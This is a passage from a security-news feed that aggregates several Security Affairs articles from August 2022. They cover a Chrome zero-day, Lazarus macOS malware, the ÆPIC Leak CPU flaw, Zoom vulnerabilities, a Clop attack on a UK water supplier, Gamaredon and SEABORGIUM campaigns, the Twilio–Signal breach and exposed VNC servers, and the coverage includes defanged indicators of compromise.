(July 4) Heap buffer overflow in the Web Real-Time Communications (WebRTC) componentCVE-2022-1364 (April 14) –  type confusion issue that resides in the V8 JavaScript engineCVE-2022-1096 – (March 25) – type Confusion in V8 JavaScript engineCVE-2022-0609 – (February 14) – use after free issue that resides in the Animation component. Users should update to version 104.0.5112.101 for macOS and Linux and 104.0.5112.102/101 for Windows. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Chrome) The post Google fixed a new Chrome Zero-Day actively exploited in the wild appeared first on Security Affairs.

[Category: Breaking News, Hacking, Security, Chrome, CVE-2022-2856, Google, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, zero-Day]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/17/22 2:31am
The North Korea-linked Lazarus Group has been observed targeting job seekers with macOS malware working also on Intel and M1 chipsets. ESET researchers continue to monitor a cyberespionage campaign, tracked as Operation In(ter)ception, that has been active at least since June 2020. The campaign targets employees working in the aerospace and military sectors and leverages decoy job offer documents. ESET published a series of tweets detailing the recent attacks, the experts spotted a signed Mac executable disguised as a job description for Coinbase. The malicious code was uploaded to VirusTotal from Brazil on August 11, 2022. #ESETresearch #BREAKING A signed Mac executable disguised as a job description for Coinbase was uploaded to VirusTotal from Brazil . This is an instance of Operation In(ter)ception by #Lazarus for Mac. @pkalnai @dbreitenbacher 1/7 pic.twitter.com/dXg89el5VT— ESET research (@ESETresearch) August 16, 2022 Malware is compiled for both Intel and Apple Silicon, it drops three files: a decoy PDF document Coinbase_online_careers_2022_07.pdf, a bundle http://FinderFontsUpdater.app and a downloader safarifontagent. The discovery is similar to other attacks detected by ESET researches in May. #ESETresearch A year ago, a signed Mach-O executable disguised as a job description was uploaded to VirusTotal from Singapore . Malware is compiled for Intel and Apple Silicon and drops a PDF decoy. We think it was part of #Lazarus campaign for Mac. @pkalnai @marc_etienne_ 1/8 pic.twitter.com/DV7peRHdnJ— ESET research (@ESETresearch) May 4, 2022 The bundle employed in the attack is signed July 21 using a certificate issued in February 2022 to a developer named Shankey Nohria and team identifier 264HFWQH63. The application is not notarized and Apple has revoked the certificate on August 12. states ESET. Experts noticed that unlike May attacks, the downloader safarifontagent connects to a different C&C server (https://concrecapital[.]com/%user%.jpg). The C2 server did not respond at the time ESET experts analyzed this malware. The researcher @h2jazi also discovered a Windows counterpart of this malware on August 4, it was dropping the exact same decoy. #Lazarus #APT:0dab8ad32f7ed4703b9217837c91cca7Coinbase_online_careers_2022_07.exeThe decoy pdf is "Engineering Manager, Product Security" job description at Coinbase.Next stage: (gone!) https://docs.mktrending[.]com/marrketend.pnghttps://t.co/XETUeA5F6B pic.twitter.com/NTFUJ9AiCO— Jazi (@h2jazi) August 4, 2022 ESET also shared Indicators of compromise (IoCs) for this threat. IoCs:FE336A032B564EEF07AFB2F8A478B0E0A37D9A1A6C4C1E7CD01E404CC5DD2853 (Extractor) 798020270861FDD6C293AE8BA13E86E100CE048830F86233910A2826FACD4272 (FinderFontsUpdater)49046DFEAEFC59747E45E013F3AB5A2895B4245CFAA218DD2863D86451104506 (safarifontagent) 6/7— ESET research (@ESETresearch) August 16, 2022 Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, North Korea) The post North Korea-linked APT targets Job Seekers with macOS malware appeared first on Security Affairs.

[Category: Breaking News, Cyber warfare, Intelligence, Malware, Hacking, hacking news, information security news, IT Information Security, macOS, malware, North Korea, Pierluigi Paganini, Security News]

[*] [-] [-] [x] [A+] [a-]  
[l] at 8/17/22 1:10am
Researchers uncovered a new flaw, dubbed ÆPIC, in Intel CPUs that enables attackers to obtain encryption keys and other secret information from the processors. The ÆPIC Leak (CVE-2022-21233) is the first architecturally CPU bug that could lead to the disclosure of sensitive data and impacts most 10th, 11th and 12th generation Intel CPUs. ÆPIC Leak works on the newest Intel CPUs based on Ice Lake, Alder Lake, and Ice Lake SP and does not rely on hyperthreading enabled. A potential security vulnerability in some Intel® Processors may allow information disclosure.Intel is releasing firmware updates to address this potential vulnerability. reads the advisory published by Intel. Improper isolation of shared resources in some Intel(R) Processors may allow a privileged user to potentially enable information disclosure via local access. The discovery of the flaw is the result of research conducted by boffins from the Sapienza University of Rome, the Graz University of Technology, Amazon Web Services, and the CISPA Helmholtz Center for Information Security. Unlike Meltdown and Spectre, ÆPIC Leak is an architectural bug, which means that the sensitive data are disclosed without relying on side channel attacks ÆPIC Leak is like an uninitialized memory read in the CPU itself. reads the description published by the researchers. A privileged attacker (Administrator or root) is required to access APIC MMIO. Thus, most systems are safe from ÆPIC Leak. However, systems relying on SGX to protect data from privileged attackers would be at risk, thus, have to be patched. The CVE-2022-21233 issue resides in the Advanced Programmable Interrupt Controller (APIC), responsible for accepting, prioritizing, and dispatching interrupts to processors. The scan of the I/O address space on Intel CPUs based on the Sunny Cove microarchitecture revealed that the memory-mapped registers of the local Advanced Programmable Interrupt Controller (APIC) are not properly initialized. As a result, architecturally reading these registers returns stale data from the microarchitecture. reads the research paper. As the I/O address space is only accessible to privileged software, ÆPIC Leak targets Intel’s TEE, SGX. ÆPIC Leak can leak data from SGX enclaves that run on the same physical core. While ÆPIC Leak would represent an immense threat in virtualized environments, hypervisors typically do not expose the local APIC registers to virtual machines, eliminating the threat in cloud-based scenarios. The experts tested the ÆPIC Leak issue with 100 different random keys and tried to leak the AES keys with a single run of the attack. The results are that full key recovery takes on average 1.35 s(n = 100, σ = 15.70%) with a success rate of 94 % The flaw enables an attacker with permissions to execute privileged native code on a target machine to extract the private keys, and worse defeat attestation, a cornerstone of the security primitives used in SGX to ensure the integrity of code and data. We show attacks that allow leaking data held in memory and registers. We demonstrate how ÆPIC Leak completely breaks the guarantees provided by SGX, deterministically leaking AES secret keys, RSA private keys, and extracting the SGX sealing key for remote attestation. concludes the paper. The researchers also propose several firmware and software mitigations that would prevent ÆPIC Leak from leaking sensitive data or completely prevent ÆPIC Leak. Intel has already released firmware updates to address the flaw. The experts published a video demo to show how an attacker can disclose data from a protected SGX enclave. The development comes as researchers demonstrated whats the first-ever side channel attack (CVE-2021-46778) on scheduler queues impacting AMD Zen 1, Zen 2, and Zen 3 microarchitectures that could be abused by an adversary to recover RSA keys. The attack, codenamed SQUIP (short for Scheduler Queue Usage via Interference Probing), entails measuring the contention level on scheduler queues to potentially glean sensitive information. No security updates have been released to patch the line of attack, but the chipmaker has recommended that software developers employ existing best practices, including constant-time algorithms and avoiding secret-dependent control flows where appropriate. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, ÆPIC Leak) The post ÆPIC Leak is the first CPU flaw able to architecturally disclose sensitive data appeared first on Security Affairs.

[Category: Breaking News, Hacking, Security, ÆPIC Leak, hacking news, information security news, Intel, IT Information Security, Pierluigi Paganini, Security Affairs, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/17/22 12:57am
Zoom addressed two high-severity vulnerabilities in its macOS app that were disclosed at the DEF CON conference. Zoom last week released macOS updates to fix two high-severity flaws in its macOS app that were disclosed at the DEF CON conference. Technical details of the vulnerabilities were disclosed at the DEF CON conference by security researcher Patrick Wardle during its talk Youre M̶u̶t̶e̶d̶ Rooted. In his talk, the expert explored Zoom’s macOS application to uncover several critical security flaws that can be exploited by a local unprivileged attacker to achieve root access to the device. Mahalo to everybody who came to my @defcon talk "Youre M̶u̶t̶e̶d̶ Rooted" Was stoked to talk about (& live-demo ) a local priv-esc vulnerability in Zoom (for macOS). Currently there is no patch Slides with full details & PoC exploit: https://t.co/viee0Yd5o2 #0day pic.twitter.com/9dW7DdUm7P— patrick wardle (@patrickwardle) August 12, 2022 Wardle demonstrated that an attacker could hijack the update mechanism to downgrade the software to an older version that is known to be affected by vulnerabilities. The experts pointed out that macOS users are not prompted for their admin password when Zoom is updated, because the auto-update feature is enabled by default. Zoom informed customers last week that macOS updates for the Zoom application patch two high-severity vulnerabilities. Details of the flaws were disclosed on Friday at the DEF CON conference in Las Vegas by macOS security researcher Patrick Wardle. Wardle, who is the founder of the Objective-See Foundation, a non-profit that provides free and open source macOS security resources, showed at DEF CON how a local, unprivileged attacker could exploit vulnerabilities in Zoom’s update process to escalate privileges to root. In this talk, we’ll explore Zoom’s macOS application to uncover several critical security flaws. Flaws, that provided a local unprivileged attacker a direct and reliable path to root. Wardle explained. The first flaw, presents itself subtly in a core cryptographic validation routine, while the second is due to a nuanced trust issue between Zoom’s client and its privileged helper component. Wardle demonstrated that a local attacker abusing the auto-update process and leveraging a cryptographic issue related to insecure update package signature validation can install an update package. Zoom addressed some related vulnerabilities in the past months, but Wardle explained that he was still able to exploit them in his attack. The day after the talk, the company released Client for Meetings for macOS 5.11.5 that fix the auto-update process vulnerability (CVE-2022-28756). The company also announced Version 5.11.3 which addresses the packet signature validation issue (CVE-2022-28751). Zoom also addressed other critical and high-severity vulnerabilities: CVE-2022-28753, CVE-2022-28754: Zoom On-Premise Deployments: Improper Access Control Vulnerability (HIGH)CVE-2022-28755: Improper URL parsing in Zoom Clients (CRITICAL)CVE-2022-28752: Local Privilege Escalation in the Zoom Rooms for Windows Client (HIGH)CVE-2022-28750: Zoom On-Premise Deployments: Stack Buffer Overflow in Meeting Connector (HIGH) Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, macOS) The post Zoom fixed two flaws in macOS App that were disclosed at DEF CON appeared first on Security Affairs.

[Category: Breaking News, Security, Hacking, hacking news, information security news, IT Information Security, macOS, Pierluigi Paganini, Security Affairs, Security News, Zoom]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/16/22 11:38am
A cyber attack disrupted the IT operations of South Staffordshire Water, a company supplying drinking water to 1.6M consumers daily. South Staffordshire Water has issued a statement confirming the security breach, the company pointed out that the attack did not impact the safety and water distribution systems. South Staffordshire Water plc known as South Staffs Water is a UK water supply company owned by a privately owned utilities company serving parts of Staffordshire the West Midlands as well as small areas of surrounding counties in England. South Staffordshire Water plc is part of South Staffordshire plc. Thanks to security systems in place, the company was able to supply safe water to its customers or those of its subsidiaries, Cambridge Water and South Staffs Water. This incident has not affected our ability to supply safe water and we can confirm we are still supplying safe water to all of our Cambridge Water and South Staffs Water customers. reads a statement published by the company. “This is thanks to the robust systems and controls over water supply and quality we have in place at all times, as well as the quick work of our teams to respond to this incident and implement the additional measures we have put in place on a precautionary basis.” South Staffordshire Water reassures customers that the cyber attack will not cause an extended outage. The company is investigating the incident and is working closely with the relevant government and regulatory authorities. The Clop ransomware gang claimed responsibility for the attack and added the name of the utility to its Tor leak site. The ransomware gang claims to be able to impact the operations and the safety of the water supply. The gang also claims to have stolen 5TB of data from the company. The ransomware group has already published a sample of stolen data that includes passports, ID Cards, and images of SCADA systems. Thames Water has denied that the Clop has breached its network and excluded any risk for its customers due to the attack. We are aware of reports in the media that Thames Water is facing a cyber attack. We want to reassure you that this is not the case and we are sorry if the reports have caused distress. reads the statement from Thames Water. As providers of an essential service, we take the security of our networks and systems very seriously and are focused on protecting them, so that we can continue to provide you with the services and support you need from us. BleepingComputer noticed that sample data published by Clop operators include usernames and passwords, which refer South Staff Water and South Staffordshire email addresses. One of the leaked documents sent to the targeted firm is explicitly addressed to South Staffordshire PLC. This circumstance suggests that Clop misidentified the victim. Cybercriminals don’t pick their targets randomly, as hitting water suppliers during harsh drought periods could apply insurmountable pressure to pay the demanded ransom. For this to happen, though, Clop has to redirect its threats to the correct entity, but considering the publicity the matter has taken, it’s probably too late for that. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, South Staffordshire Water) The post Clop gang targeted UK drinking water supplier South Staffordshire Water appeared first on Security Affairs.

[Category: Breaking News, Cyber Crime, ICS-SCADA, Malware, clop ransomware, Cybercrime, data breach, Hacking, hacking news, ICS, information security news, IT Information Security, malware, Pierluigi Paganini, SCADA, Security News, South Staffordshire Water]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/16/22 2:15am
Russia-linked Gamaredon APT group targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad. Russia-linked Gamaredon APT group (aka Shuckworm, Actinium, Armageddon, Primitive Bear, and Trident Ursa) targets Ukrainian entities with PowerShell info-stealer malware dubbed GammaLoad, Symantec warns. The Computer Emergency Response Team of Ukraine (CERT-UA) confirmed the ongoing cyber espionage campaign. Symantec and TrendMicro first discovered the Gamaredon group in 2015, but evidence of its activities has been dated back to 2013. The group targeted government and military organizations in Ukraine. The recent wave of attacks began on July 15 and was ongoing as recently as August 8, 2022. The attack chain starts with spear-phishing messages using a self-extracting 7-Zip file, which was downloaded via the system’s default browser. Then the mshta.exe downloaded an XML file, which was likely masquerading as an HTML application (HTA) file. The downloading of the XML file onto victim networks was followed by the execution of a PowerShell stealer. We saw three versions of the same PowerShell stealer appear on the one system. reads the analysis published by Symantec. It’s possible the attackers may have deployed multiple versions of the stealer, which were all very similar, as an attempt to evade detection. The files were hosted on a subdomain known to be associated with Shuckworm activity since May 2022. The final payload deployed by the attackers is a PowerShell stealer malware dubbed GammaLoad.PS1_v2. In some cases, attackers also delivered two backdoors named Giddome and Pterodo, which are known to be part of the Gamaredon arsenal. Pterodo is a multistage Visual Basic Script (VBS) backdoor designed to collect sensitive information or maintain access to compromised machines. It is distributed in a spear-phishing campaign with a weaponized office document that appears to be designed to lure military personnel.  The Giddome backdoor supports multiple capabilities, including recording audio, taking screenshots, logging keystrokes, and downloading and executing arbitrary executables onto the infected hosts. Threat actors also used the legitimate remote desktop protocol (RDP) tools Ammyy Admin and AnyDesk for remote access As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to be continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure does not deter the group from its activities. concludes the report. While Shuckworm is not necessarily the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations. Symantec also shared Indicators of Compromise (IoCs) for this campaign. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Gamaredon) The post Russia-linked Gamaredon APT continues to target Ukraine appeared first on Security Affairs.

[Category: APT, Breaking News, Cyber warfare, Malware, Gamaredon, Hacking, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, Security News, Ukraine]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/16/22 12:56am
For about 1,900 users, Twilio hackers could have attempted to re-register their number to another device or learned that their number was registered to Signal. Communication company Twilio provides Signal with phone number verification services, and recent security breach it has suffered had also impacted some users of the popular instant-messaging app. Twilio hackers could have attempted to re-register the number of Signal users to another device or learned that their number was registered to Signal. For about 1,900 users, an attacker could have attempted to re-register their number to another device or learned that their number was registered to Signal. This attack has since been shut down by Twilio. 1,900 users is a very small percentage of Signal’s total users, meaning that most were not affected. reads the advisory published by Signal. The company said that all users can rest assured that their message history, contact lists, profile information, whom theyd blocked, and other personal data remain private and secure and were not affected. The Signal PIN was not exposed as part of this security breach. The company is notifying the 1,900 impacted users, and is prompting them to re-register Signal on their devices. Users that have received an SMS message from Signal with a link to a support article, have to follow these steps: Open Signal on your phone and register your Signal account again if the app prompts you to do so.To best protect your account, we strongly recommend that you enable registration lock in the app’s Settings. We created this feature to protect users against threats like the Twilio attack. The attackers gained access to Twilio’s customer support console via phishing. For approximately 1,900 users, either 1) their phone numbers were potentially revealed as being registered to a Signal account, or 2) the SMS verification code used to register with Signal was revealed. The experts added that the attacker explicitly searched for three numbers, and Signal received a report from one of those three users that their account was re-registered. We encourage users to enable registration lock for their Signal account. Using an optional registration lock with your Signal PIN adds an additional verification layer to the registration process. Go to Signal Settings (profile) Account Registration Lock to do this. concludes the security advisory. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, Signal) The post Phone numbers of 1,900 Signal users exposed as a result of Twilio security breach appeared first on Security Affairs.

[Category: Breaking News, Data Breach, Hacking, Mobile, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security News, Signal, Twilio]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/15/22 3:46pm
Microsoft disrupted a hacking operation linked conducted by Russia-linked APT SEABORGIUM aimed at NATO countries. The Microsoft Threat Intelligence Center (MSTIC) has disrupted activity by SEABORGIUM (aka ColdRiver, TA446), a Russia-linked threat actor that is behind a persistent hacking campaign targeting people and organizations in NATO countries. Microsoft has disrupted activity by SEABORGIUM, a Russia-based actor launching persistent phishing, credential and data theft, intrusions, and hack-and-leak campaigns tied to espionage. More details + TTPs in this MSTIC blog: https://t.co/nVoF8GxrFQ— Microsoft Security Intelligence (@MsftSecIntel) August 15, 2022 SEABORGIUM has been active since at least 2017, its campaigns involve persistent phishing and credential theft campaigns leading to intrusions and data theft. The APT primarily targets NATO countries, but experts also observed campaigns targeting the Baltics, Nordics, and Eastern Europe regions, including Ukraine. The SEABORGIUM group primarily focuses operations on defense and intelligence consulting companies, non-governmental organizations (NGOs) and intergovernmental organizations (IGOs), think tanks, and higher education. The group also targets former intelligence officials, experts in Russian affairs, and Russian citizens abroad. SEABORGIUMs campaigns begin with a reconnaissance activity of target individuals, with a focus on identifying their contacts on social networks or the sphere of influence. Based on some of the impersonation and targeting observed, we suspect that the threat actor uses social media platforms, personal directories, and general open-source intelligence (OSINT) to supplement their reconnaissance efforts. reads the post published by Microsoft. MSTIC, in partnership with LinkedIn, has observed fraudulent profiles attributed to SEABORGIUM being used sporadically for conducting reconnaissance of employees from specific organizations of interest.  Threat actors used fake identities to contact target individuals and start a conversation with them to build a relationship and trick them into opening an attachment sent via phishing messages The phishing messages used PDF attachments and in some cases, they included links to file or document hosting services, or to OneDrive accounts hosting the PDF documents. Upon opening the PDF file, it will display a message stating that the document could not be viewed and that they should click on a button to try again. Clicking the button, the victim is redirected to a landing page running phishing frameworks, such as EvilGinx, that displays the sign-in page for a legitimate provider and intercept any credentials After the credentials are captured, the victim is redirected to a website or document to avoid raising suspicion.   Once the attackers have gained access to the targeted email account, they exfiltrate intelligence data (emails and attachments) or set up forwarding rules from victim inboxes to actor-controlled dead drop accounts. In several cases, SEABORGIUM has been observed using their impersonation accounts to facilitate dialog with specific people of interest. Microsoft confirmed it has taken action to disrupt SEABORGIUMs operations by disabling accounts used for surveillance, phishing, and email collection. The IT giant also shared Indicators of compromise (IOCs) for this threat actor, which includes a list of more than sixty domains used by the APT in its phishing campaigns. The complete list of domains can be found in Microsofts advisory, as well as safeguards that network defenders can use to prevent similar attacks. Defenses include disabling email auto-forwarding in Microsoft 365, using the IOCs to investigate for potential compromise, requiring MFA on all accounts, and for more security, requiring FIDO security keys. Microsoft has also released Azure Sentinel hunting queries [1, 2] that can be used to check for malicious activity. Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, NATO) The post Microsoft disrupts SEABORGIUM ’s ongoing phishing operations appeared first on Security Affairs.

[Category: APT, Breaking News, Cyber warfare, Hacking, Intelligence, Cyberespionage, hacking news, information security news, IT Information Security, NATO, Pierluigi Paganini, Russia, seaborgiums, Security News]

[*] [+] [-] [x] [A+] [a-]  
[l] at 8/15/22 12:01pm
Researchers from threat intelligence firm Cyble reported a surge in attacks targeting virtual network computing (VNC). Virtual Network Computing (VNC) is a graphical desktop-sharing system that leverages the Remote Frame Buffer (RFB) protocol to control another machine remotely. It transmits the keyboard and mouse input from one computer to another, relaying the graphical-screen updates, over a network. Researchers from Cyber looked for VNC exposed over the internet and discovered over 8000 VNC instances with authentication disabled, most of them in China, Sweden, and the United States. Cyble observed a surge in attacks on the default port for VNC, port 5900, most of them originated from the Netherlands, Russia, and Ukraine. Exposing VNCs to the internet, increases the likelihood of a cyberattack. Threat actors could use the access through VNC to carry out a broad range of malicious activities, such as deploying ransomware, malware, or spy on the victims. The researchers discovered multiple Human Machine Interface (HMI) systems, Supervisory Control And Data Acquisition Systems (SCADA), Workstations, etc., connected via VNC and exposed over the internet Cyble also reported that threat actors are selling access to systems exposed on the Internet via VNC on cybercrime forums. “Our investigation found that selling, buying, and distributing exposed assets connected via VNCs are frequently on cybercrime forums and markets. A few examples of the same can be seen in the figures below. Cyble states. The experts pointed out that even if the count of exposed VNCs is low compared to previous years, some of the exposed VNCs belong to various organizations in the Critical Infrastructures sector such as water treatment plants, manufacturing plants, research facilities, etc. “Remotely accessing the IT/OT infrastructure assets is pretty handy and has been widely adopted due to the COVID-19 Pandemic and work-from-home policies. However, if organizations do not have the appropriate safety measures and security checks in place, this situation can lead to severe monetary loss for an organization. Leaving VNCs exposed over the internet without any authentication makes it fairly easy for intruders to penetrate the victim’s network and create havoc. Cyble concludes. Attackers might also try to exploit the VNC service by using various vulnerabilities and techniques, allowing them to connect with the exposed asset(s).” Follow me on Twitter: @securityaffairs and Facebook try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} Pierluigi Paganini (SecurityAffairs – hacking, VNC) The post VNC instances exposed to Internet pose critical infrastructures at risk appeared first on Security Affairs.

[Category: Breaking News, Hacking, ICS-SCADA, Security, critical infrastructure, hacking news, information security news, IT Information Security, Pierluigi Paganini, Security Affairs, Security News, VNC]

As of 8/19/22 1:52pm. Last new 8/19/22 10:41am.

Next feed in category: Dark Reading